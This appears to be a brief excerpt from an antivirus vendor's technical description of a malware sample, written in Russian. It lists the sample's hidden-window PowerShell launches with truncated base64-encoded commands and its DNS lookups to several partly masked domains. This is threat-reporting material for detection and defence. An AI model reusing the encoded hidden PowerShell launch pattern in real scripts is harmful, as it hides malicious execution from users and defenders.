Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAASwBnAGwAbABsAGEAbQB0AHEAZwBnAHMAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AQwBmAG8AcwByAGwAdgB4AGMAaABnAHoAcAAgACMAPgAgACQARwBzAHYAeQBkAGYAbAB3AD0AJwBY...
- DNS ASK dd##s.net
- DNS ASK ur####hfairy.com
- DNS ASK de#.#teamymm.ca
- DNS ASK wo#####ss.danwin1210.me
- DNS ASK ka####ewasamaj.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAASwBnAGwAbABsAGEAbQB0AHEAZwBnAHMAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AQwBmAG8AcwByAGwAdgB4AGMAaABnAHoAcAAgACMAPgAgACQARwBzAHYAeQBkAGYAbAB3AD0AJwBY...' (со скрытым окном)